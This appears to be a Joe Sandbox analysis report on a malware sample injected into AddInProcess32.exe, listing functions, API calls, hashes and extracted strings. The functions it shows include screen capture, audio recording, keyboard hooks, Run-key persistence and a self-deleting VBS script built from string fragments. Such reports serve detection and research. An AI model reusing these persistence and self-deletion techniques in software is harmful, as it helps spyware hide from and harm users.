                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a25cfcba4cb24fdf0fe01b1cfb0217293a2d97f1f2c5caf2e195f2ab18ef9283
                                                                                  • Instruction ID: ae92f65c41008aac329c7d646b8d99fb38e08d933e524e45c1d49ddbea67f2dd
                                                                                  • Opcode Fuzzy Hash: a25cfcba4cb24fdf0fe01b1cfb0217293a2d97f1f2c5caf2e195f2ab18ef9283
                                                                                  • Instruction Fuzzy Hash: 36616671E00B0866DA389A2968927BF2795DB2D708F14392FF483DF3C1C66D9D42C65E
                                                                                  Function 0043D9CC Relevance: .2, Instructions: 214COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 5939193a035a9f71e1be9e8e65b71e813b2798266dd155f684168ca2d02e33de
                                                                                  • Instruction ID: 723622f834e47c23106d271d0d88d1dc321cab027353f38a50b8b0e2426ac40f
                                                                                  • Opcode Fuzzy Hash: 5939193a035a9f71e1be9e8e65b71e813b2798266dd155f684168ca2d02e33de
                                                                                  • Instruction Fuzzy Hash: D4518BB1E0864457DF38A9A976557BFA7899B4D304F18391FD882D7382C60CED06C31E
                                                                                  Function 0043DBFB Relevance: .2, Instructions: 214COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 2c66de2964dbf7c0103d26a637bb9c3df90e686996b70b361c2c57e4183adb73
                                                                                  • Instruction ID: 66342361016897109e24a26c448f772de671845df11bd1e198e526645aade2d2
                                                                                  • Opcode Fuzzy Hash: 2c66de2964dbf7c0103d26a637bb9c3df90e686996b70b361c2c57e4183adb73
                                                                                  • Instruction Fuzzy Hash: CD518970E10A0556DB394969B9957BF379A9F1E304F18380FE842DB382C28CDD06D35E
                                                                                  Function 00425964 Relevance: .2, Instructions: 187COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 52996d606e7b7a479a496c7ab7b6ff000045ef0ea2a1f95204311ebe95ed7444
                                                                                  • Instruction ID: 6d2995492066a9b16b195f6531796c1ccffa7af2014367dacfc1c2128089f42d
                                                                                  • Opcode Fuzzy Hash: 52996d606e7b7a479a496c7ab7b6ff000045ef0ea2a1f95204311ebe95ed7444
                                                                                  • Instruction Fuzzy Hash: 49617F326083049FC304DF75E482A5FB7E4AFCC718F450E2EF49996251E774EA088B86
                                                                                  Function 00436510 Relevance: .1, Instructions: 76COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                  • Instruction ID: 3c347dad04b4a8ced02cdc3a1d1f73fe72ec142e803a1f09a224371d112cc28a
                                                                                  • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                  • Instruction Fuzzy Hash: E811297720104373E6158A2DF4B86B7A7A5EACD320F2FE377C0424B75CC12AD5559508
                                                                                  Function 00416E7E Relevance: 47.6, APIs: 26, Strings: 1, Instructions: 307windowmemoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00416E98
                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 00416EA5
                                                                                    • Part of subcall function 004172DF: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 0041730F
                                                                                  • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00416F1B
                                                                                  • DeleteDC.GDI32(00000000), ref: 00416F32
                                                                                  • DeleteDC.GDI32(00000000), ref: 00416F35
                                                                                  • DeleteObject.GDI32(00000000), ref: 00416F38
                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00416F59
                                                                                  • DeleteDC.GDI32(00000000), ref: 00416F6A
                                                                                  • DeleteDC.GDI32(00000000), ref: 00416F6D
                                                                                  • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00416F91
                                                                                  • GetIconInfo.USER32(?,?), ref: 00416FC5
                                                                                  • DeleteObject.GDI32(?), ref: 00416FF4
                                                                                  • DeleteObject.GDI32(?), ref: 00417001
                                                                                  • DrawIcon.USER32(00000000,?,?,?), ref: 0041700E
                                                                                  • GetObjectA.GDI32(00000000,00000018,?), ref: 00417026
                                                                                  • LocalAlloc.KERNEL32(00000040,00000001), ref: 00417095
                                                                                  • GlobalAlloc.KERNEL32(00000000,?), ref: 00417104
                                                                                  • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00417128
                                                                                  • DeleteDC.GDI32(?), ref: 0041713C
                                                                                  • DeleteDC.GDI32(00000000), ref: 0041713F
                                                                                  • DeleteObject.GDI32(00000000), ref: 00417142
                                                                                  • GlobalFree.KERNEL32(?), ref: 0041714D
                                                                                  • DeleteObject.GDI32(00000000), ref: 00417201
                                                                                  • GlobalFree.KERNEL32(?), ref: 00417208
                                                                                  • DeleteDC.GDI32(?), ref: 00417218
                                                                                  • DeleteDC.GDI32(00000000), ref: 00417223
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
                                                                                  • String ID: DISPLAY
                                                                                  • API String ID: 479521175-865373369
                                                                                  • Opcode ID: d0a604632afc670b0bed5d73b6cf7923d5ac7d66a84e9eea8ade3fd839e617a0
                                                                                  • Instruction ID: 4ba325f74191387ade15767708145f982ef5b1c7ca4df498548f130554e7309d
                                                                                  • Opcode Fuzzy Hash: d0a604632afc670b0bed5d73b6cf7923d5ac7d66a84e9eea8ade3fd839e617a0
                                                                                  • Instruction Fuzzy Hash: 6FB16A315083009FD720DF24DC44BABBBE9EF88755F41482EF98993291DB38E945CB5A
                                                                                  Function 0040BFDE Relevance: 42.3, APIs: 6, Strings: 18, Instructions: 281registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 004112B5: TerminateProcess.KERNEL32(00000000,004721E8,0040E2B2), ref: 004112C5
                                                                                    • Part of subcall function 004112B5: WaitForSingleObject.KERNEL32(000000FF), ref: 004112D8
                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C0D6
                                                                                  • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C0E9
                                                                                  • SetFileAttributesW.KERNEL32(?,00000080), ref: 0040C102
                                                                                  • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040C132
                                                                                    • Part of subcall function 0040A7F2: TerminateThread.KERNEL32(Function_00009305,00000000,004721E8,0040BC76,?,00472200,pth_unenc,004721E8), ref: 0040A801
                                                                                    • Part of subcall function 0040A7F2: UnhookWindowsHookEx.USER32(?), ref: 0040A811
                                                                                    • Part of subcall function 0040A7F2: TerminateThread.KERNEL32(004092EF,00000000,?,00472200,pth_unenc,004721E8), ref: 0040A823
                                                                                    • Part of subcall function 0041A17B: CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041A29A,00000000,00000000,?), ref: 0041A1BA
                                                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040C37D
                                                                                  • ExitProcess.KERNEL32 ref: 0040C389
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                  • String ID: """, 0$")$CreateObject("WScript.Shell").Run "cmd /c ""$H"G$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$t<F$wend$while fso.FileExists("
                                                                                  • API String ID: 1861856835-1953526029
                                                                                  • Opcode ID: e658372aa2ace14a3aa0232e890420069580ff818bd4bb758409c283b9428d45
                                                                                  • Instruction ID: 20f5f97700cb48a3d0b4a42ff25d793d854bdbfc6fb2dd54058f707cc559a17d
                                                                                  • Opcode Fuzzy Hash: e658372aa2ace14a3aa0232e890420069580ff818bd4bb758409c283b9428d45
                                                                                  • Instruction Fuzzy Hash: 579180712042405AC314FB62D8929EF77E99F90708F50453FB586B31E3EE789E49C69E
                                                                                  Function 00410EDA Relevance: 42.2, APIs: 17, Strings: 7, Instructions: 190synchronizationsleepfileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateMutexA.KERNEL32(00000000,00000001,00000000,00472200,00471FFC,00000000), ref: 00410EF9
                                                                                  • ExitProcess.KERNEL32(00000000), ref: 00410F05
                                                                                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00410F7F
                                                                                  • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00410F8E
                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00410F99
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00410FA0
                                                                                  • GetCurrentProcessId.KERNEL32 ref: 00410FA6
                                                                                  • PathFileExistsW.SHLWAPI(?), ref: 00410FD7
                                                                                  • GetTempPathW.KERNEL32(00000104,?), ref: 0041103A
                                                                                  • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 00411054
                                                                                  • lstrcatW.KERNEL32(?,.exe), ref: 00411066
                                                                                    • Part of subcall function 0041A17B: CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041A29A,00000000,00000000,?), ref: 0041A1BA
                                                                                  • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 004110A6
                                                                                  • Sleep.KERNEL32(000001F4), ref: 004110E7
                                                                                  • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 004110FC
                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00411107
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0041110E
                                                                                  • GetCurrentProcessId.KERNEL32 ref: 00411114
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                                                                  • String ID: (#G$.exe$H"G$WDH$exepath$open$temp_
                                                                                  • API String ID: 2649220323-71629269
                                                                                  • Opcode ID: 7f8b91453a1e6d37aba88f42532a77a7bcfbaa7b117ba8c68f12d773b4b628c0
                                                                                  • Instruction ID: 69aa2ac3f34532c799e46254488c9bc95b38e37df126af38d98eea17990f3aaa
                                                                                  • Opcode Fuzzy Hash: 7f8b91453a1e6d37aba88f42532a77a7bcfbaa7b117ba8c68f12d773b4b628c0
                                                                                  • Instruction Fuzzy Hash: 9D51A671A003196BDF10A7A09C59EEE336D9B04715F5041BBF605A31E2EFBC8E86875D
                                                                                  Function 0040B871 Relevance: 40.5, APIs: 10, Strings: 13, Instructions: 296fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _wcslen.LIBCMT ref: 0040B882
                                                                                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00471FFC), ref: 0040B89B
                                                                                  • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe,00000000,00000000,00000000,00000000,00000000,?,00471FFC), ref: 0040B952
                                                                                  • _wcslen.LIBCMT ref: 0040B968
                                                                                  • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe,00000000,00000000,00000000), ref: 0040B9E0
                                                                                  • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BA22
                                                                                  • _wcslen.LIBCMT ref: 0040BA25
                                                                                  • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BA3C
                                                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040BC2A
                                                                                  • ExitProcess.KERNEL32 ref: 0040BC36
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$_wcslen$AttributesCopy$CreateDirectoryExecuteExitProcessShell
                                                                                  • String ID: """, 0$6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$CreateObject("WScript.Shell").Run "cmd /c ""$Set fso = CreateObject("Scripting.FileSystemObject")$Temp$WScript.Sleep 1000$\install.vbs$fso.DeleteFile $fso.DeleteFile(Wscript.ScriptFullName)$open$!G$!G
                                                                                  • API String ID: 2743683619-2884405633
                                                                                  • Opcode ID: bc7a761b7f8a7faaf126ce28aab3d5fb2a3d74aecff730b0b059b7d0313fb715
                                                                                  • Instruction ID: 1f37921bc36cc04280d9be7a1af933bc03f5727a4608831148a2c1203a4a5f71
                                                                                  • Opcode Fuzzy Hash: bc7a761b7f8a7faaf126ce28aab3d5fb2a3d74aecff730b0b059b7d0313fb715
                                                                                  • Instruction Fuzzy Hash: CA9161712083415BC218F766DC92EAF77D8AF90708F50043FF546A61E2EE7C9A49C69E
                                                                                  Function 0040BC59 Relevance: 38.8, APIs: 6, Strings: 16, Instructions: 259registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 004112B5: TerminateProcess.KERNEL32(00000000,004721E8,0040E2B2), ref: 004112C5
                                                                                    • Part of subcall function 004112B5: WaitForSingleObject.KERNEL32(000000FF), ref: 004112D8
                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,00472200,pth_unenc,004721E8), ref: 0040BD63
                                                                                  • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040BD76
                                                                                  • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,00472200,pth_unenc,004721E8), ref: 0040BDA6
                                                                                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00472200,pth_unenc,004721E8), ref: 0040BDB5
                                                                                    • Part of subcall function 0040A7F2: TerminateThread.KERNEL32(Function_00009305,00000000,004721E8,0040BC76,?,00472200,pth_unenc,004721E8), ref: 0040A801
                                                                                    • Part of subcall function 0040A7F2: UnhookWindowsHookEx.USER32(?), ref: 0040A811
                                                                                    • Part of subcall function 0040A7F2: TerminateThread.KERNEL32(004092EF,00000000,?,00472200,pth_unenc,004721E8), ref: 0040A823
                                                                                    • Part of subcall function 00419959: GetCurrentProcessId.KERNEL32(00000000,75923530,00000000,?,?,?,?,00469654,0040BDCB,.vbs,?,?,?,?,?,00472200), ref: 00419980
                                                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040BFD0
                                                                                  • ExitProcess.KERNEL32 ref: 0040BFD7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                  • String ID: ")$.vbs$H"G$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                                                                                  • API String ID: 3797177996-2974882535
                                                                                  • Opcode ID: 306cdc7268d5e4f4d9ffd7b65128ba4b94d279ba2d7c1b6e57378c9487e9cf78
                                                                                  • Instruction ID: 6c8f8b33712d81dc7036d24bc004af62d002185c7e194acf753e7914dc64dab3
                                                                                  • Opcode Fuzzy Hash: 306cdc7268d5e4f4d9ffd7b65128ba4b94d279ba2d7c1b6e57378c9487e9cf78
                                                                                  • Instruction Fuzzy Hash: DD816E716042405AC714FB62D8929EF77A8AF90708F10443FF586A71E2EF789E49C69E
                                                                                  Function 00418FFD Relevance: 38.7, APIs: 12, Strings: 10, Instructions: 180synchronizationCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 004190F2
                                                                                  • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 00419106
                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00463050), ref: 0041912E
                                                                                  • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00471E78,00000000), ref: 00419144
                                                                                  • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 00419185
                                                                                  • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041919D
                                                                                  • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 004191B2
                                                                                  • SetEvent.KERNEL32 ref: 004191CF
                                                                                  • WaitForSingleObject.KERNEL32(000001F4), ref: 004191E0
                                                                                  • CloseHandle.KERNEL32 ref: 004191F0
                                                                                  • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 00419212
                                                                                  • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041921C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                                  • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
                                                                                  • API String ID: 738084811-1354618412
                                                                                  • Opcode ID: 7ee231967584c923912fc0a6995a0b1496ba2b121e3e8896045f64c6575b1494
                                                                                  • Instruction ID: 6660e32d934ed13bda46fa62e77153e47455c80990ba371f4f5bcee5a70a39dd
                                                                                  • Opcode Fuzzy Hash: 7ee231967584c923912fc0a6995a0b1496ba2b121e3e8896045f64c6575b1494
                                                                                  • Instruction Fuzzy Hash: 6C5191712043056BD604FB75DC96EBF369CDB81398F10053FF44A621E2EE789D898A6E
                                                                                  Function 00401A4D Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AB9
                                                                                  • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401AE3
                                                                                  • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401AF3
                                                                                  • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B03
                                                                                  • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B13
                                                                                  • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B23
                                                                                  • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B34
                                                                                  • WriteFile.KERNEL32(00000000,0046FA9A,00000002,00000000,00000000), ref: 00401B45
                                                                                  • WriteFile.KERNEL32(00000000,0046FA9C,00000004,00000000,00000000), ref: 00401B55
                                                                                  • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B65
                                                                                  • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B76
                                                                                  • WriteFile.KERNEL32(00000000,0046FAA6,00000002,00000000,00000000), ref: 00401B87
                                                                                  • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401B97
                                                                                  • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BA7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$Write$Create
                                                                                  • String ID: RIFF$WAVE$data$fmt
                                                                                  • API String ID: 1602526932-4212202414
                                                                                  • Opcode ID: e953cdad80a2b5f15463d19f06cbbe214ca4708b9acf4e214683fef01c63ba87
                                                                                  • Instruction ID: fa9573d22dfebaa7cc70b9682dc8642ba3498ee27ac2ec60dc87a96e6c13d219
                                                                                  • Opcode Fuzzy Hash: e953cdad80a2b5f15463d19f06cbbe214ca4708b9acf4e214683fef01c63ba87
                                                                                  • Instruction Fuzzy Hash: 46416F726543197AE210DB91DD85FBB7EECEB85B50F40042AF648D6080E7A4E909DBB3
                                                                                  Function 0044C60D Relevance: 25.9, APIs: 17, Instructions: 419COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _free$EnvironmentVariable$_wcschr
                                                                                  • String ID:
                                                                                  • API String ID: 3899193279-0
                                                                                  • Opcode ID: 684045cb82c272c6e2ac36361ff8b964f23035e186c2d5dbd227a350b29f8928
                                                                                  • Instruction ID: f90cfe9d57a3c7213274ca364bab7ea13f4483d5bd7e80e8c07ab134bc70d503
                                                                                  • Opcode Fuzzy Hash: 684045cb82c272c6e2ac36361ff8b964f23035e186c2d5dbd227a350b29f8928
                                                                                  • Instruction Fuzzy Hash: 80D136719023007BFB60AF7598C166B7BA4AF15718F09817FF985A7381FB3989008B5D
                                                                                  Function 0044E4A6 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 114COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ___free_lconv_mon.LIBCMT ref: 0044E4EA
                                                                                    • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D6FF
                                                                                    • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D711
                                                                                    • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D723
                                                                                    • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D735
                                                                                    • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D747
                                                                                    • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D759
                                                                                    • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D76B
                                                                                    • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D77D
                                                                                    • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D78F
                                                                                    • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7A1
                                                                                    • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7B3
                                                                                    • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7C5
                                                                                    • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7D7
                                                                                  • _free.LIBCMT ref: 0044E4DF
                                                                                    • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                                                                                    • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                                                                                  • _free.LIBCMT ref: 0044E501
                                                                                  • _free.LIBCMT ref: 0044E516
                                                                                  • _free.LIBCMT ref: 0044E521
                                                                                  • _free.LIBCMT ref: 0044E543
                                                                                  • _free.LIBCMT ref: 0044E556
                                                                                  • _free.LIBCMT ref: 0044E564
                                                                                  • _free.LIBCMT ref: 0044E56F
                                                                                  • _free.LIBCMT ref: 0044E5A7
                                                                                  • _free.LIBCMT ref: 0044E5AE
                                                                                  • _free.LIBCMT ref: 0044E5CB
                                                                                  • _free.LIBCMT ref: 0044E5E3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                  • String ID: pF
                                                                                  • API String ID: 161543041-2973420481
                                                                                  • Opcode ID: b166b7e86ef1a7ddfa2e36ec319a6e916c21ca5d81851e2e5517d42b5c42f7b7
                                                                                  • Instruction ID: 6e8371ae3b83bc2427c047bff221b97f6cd80994471b0a2caeb41cff5b169df7
                                                                                  • Opcode Fuzzy Hash: b166b7e86ef1a7ddfa2e36ec319a6e916c21ca5d81851e2e5517d42b5c42f7b7
                                                                                  • Instruction Fuzzy Hash: D4315072500304AFFB205E7AD945B5BB3E5BF00719F55851FE488D6251EE39ED408B18
                                                                                  Function 004137DC Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0041382B
                                                                                  • LoadLibraryA.KERNEL32(?), ref: 0041386D
                                                                                  • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 0041388D
                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00413894
                                                                                  • LoadLibraryA.KERNEL32(?), ref: 004138CC
                                                                                  • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 004138DE
                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 004138E5
                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 004138F4
                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 0041390B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
